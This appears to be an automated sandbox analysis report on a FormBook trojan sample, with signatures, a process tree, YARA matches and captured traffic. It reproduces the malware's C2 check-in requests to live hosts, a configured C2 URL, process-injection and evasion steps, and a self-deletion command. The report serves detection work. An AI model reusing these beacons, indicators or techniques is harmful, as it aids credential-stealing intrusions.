Windows Analysis Report iAuPyHuUkk

Overview

General Information

Sample Name: iAuPyHuUkk (renamed file extension from none to exe)
Analysis ID: 501991
MD5: 6040407905ea1aa24dd58dc8befa4255
SHA1: 96ecf27fd10a6663cbfaadb7643abeaf4061ea77
SHA256: 2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • iAuPyHuUkk.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: 6040407905EA1AA24DD58DC8BEFA4255)
    • iAuPyHuUkk.exe (PID: 6968 cmdline: C:\Users\user\Desktop\iAuPyHuUkk.exe MD5: 6040407905EA1AA24DD58DC8BEFA4255)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • control.exe (PID: 3540 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 4432 cmdline: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.iAuPyHuUkk.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.iAuPyHuUkk.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
3.2.iAuPyHuUkk.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
3.2.iAuPyHuUkk.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Multi AV Scanner detection for submitted file
Source: iAuPyHuUkk.exe, ReversingLabs: Detection: 15%
Yara detected FormBook
Antivirus detection for URL or domain
Source: http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5, Avira URL Cloud: Label: malware
Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: iAuPyHuUkk.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: iAuPyHuUkk.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D0440
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D042F
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D04CC
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D04AF
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D12AE
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D13C9
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D138F
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then jmp 064D12EEh, 0_2_064D13B7
Source: C:\Users\user\Desktop\iAuPyHuUkk.exe, Code function: 4x nop then pop edi, 3_2_0041568A
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 13_2_009C568A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.vintagepaseo.com
Source: C:\Windows\explorer.exe, Domain query: www.brandmty.net
Source: C:\Windows\explorer.exe, Domain query: www.iphone13promax.design
Source: C:\Windows\explorer.exe, Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe, Domain query: www.umdasch-lagertechnik.com
Source: C:\Windows\explorer.exe, Domain query: www.districonio.com
Source: C:\Windows\explorer.exe, Network Connect: 217.160.0.226 80
Source: C:\Windows\explorer.exe, Network Connect: 154.216.110.149 80
Source: C:\Windows\explorer.exe, Domain query: www.cyebang.com
Source: C:\Windows\explorer.exe, Domain query: www.xn--aprendes-espaol-brb.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.aliexpress-br.com/mexq/
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: global traffic, HTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1, Host: www.vintagepaseo.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1, Host: www.xn--aprendes-espaol-brb.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1, Host: www.cyebang.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 208.91.197.27
            Source: unknownDNS traffic detected: queries for: www.iphone13promax.design
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.vintagepaseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.xn--aprendes-espaol-brb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1Host: www.cyebang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match File source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: iAuPyHuUkk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185F0 NtCreateFile,3_2_004185F0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004186A0 NtReadFile,3_2_004186A0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00418720 NtClose,3_2_00418720
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,3_2_004187D0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185EB NtCreateFile,3_2_004185EB
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041869A NtReadFile,3_2_0041869A
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041871C NtClose,3_2_0041871C
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187CA NtAllocateVirtualMemory,3_2_004187CA
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04BD9860
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9840 NtDelayExecution,LdrInitializeThunk,13_2_04BD9840
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99A0 NtCreateSection,LdrInitializeThunk,13_2_04BD99A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95D0 NtClose,LdrInitializeThunk,13_2_04BD95D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04BD9910
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9540 NtReadFile,LdrInitializeThunk,13_2_04BD9540
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04BD96E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96D0 NtCreateKey,LdrInitializeThunk,13_2_04BD96D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04BD9660
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9650 NtQueryValueKey,LdrInitializeThunk,13_2_04BD9650
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A50 NtCreateFile,LdrInitializeThunk,13_2_04BD9A50
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9780 NtMapViewOfSection,LdrInitializeThunk,13_2_04BD9780
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9FE0 NtCreateMutant,LdrInitializeThunk,13_2_04BD9FE0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9710 NtQueryInformationToken,LdrInitializeThunk,13_2_04BD9710
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98A0 NtWriteVirtualMemory,13_2_04BD98A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98F0 NtReadVirtualMemory,13_2_04BD98F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9820 NtEnumerateKey,13_2_04BD9820
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDB040 NtSuspendThread,13_2_04BDB040
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95F0 NtQueryInformationFile,13_2_04BD95F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99D0 NtCreateProcessEx,13_2_04BD99D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDAD30 NtSetContextThread,13_2_04BDAD30
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9520 NtWaitForSingleObject,13_2_04BD9520
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9560 NtWriteFile,13_2_04BD9560
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9950 NtQueueApcThread,13_2_04BD9950
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A80 NtOpenDirectoryObject,13_2_04BD9A80
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A20 NtResumeThread,13_2_04BD9A20
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9610 NtEnumerateValueKey,13_2_04BD9610
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A10 NtQuerySection,13_2_04BD9A10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A00 NtProtectVirtualMemory,13_2_04BD9A00
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9670 NtQueryInformationProcess,13_2_04BD9670
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA3B0 NtGetContextThread,13_2_04BDA3B0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD97A0 NtUnmapViewOfSection,13_2_04BD97A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9730 NtQueryVirtualMemory,13_2_04BD9730
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA710 NtOpenProcessToken,13_2_04BDA710
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9B00 NtSetValueKey,13_2_04BD9B00
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9770 NtSetInformationFile,13_2_04BD9770
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA770 NtOpenThread,13_2_04BDA770
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9760 NtOpenProcess,13_2_04BD9760
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85F0 NtCreateFile,13_2_009C85F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C86A0 NtReadFile,13_2_009C86A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87D0 NtAllocateVirtualMemory,13_2_009C87D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C8720 NtClose,13_2_009C8720
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85EB NtCreateFile,13_2_009C85EB
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C869A NtReadFile,13_2_009C869A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87CA NtAllocateVirtualMemory,13_2_009C87CA
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C871C NtClose,13_2_009C871C
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilename vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000000.348390007.0000000000F02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000002.375787756.0000000008280000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000000.367675277.0000000000BC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.456333138.0000000003635000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: iAuPyHuUkk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: iAuPyHuUkk.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe File created: C:\Users\user\AppData\Local\Gottschalks
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/3
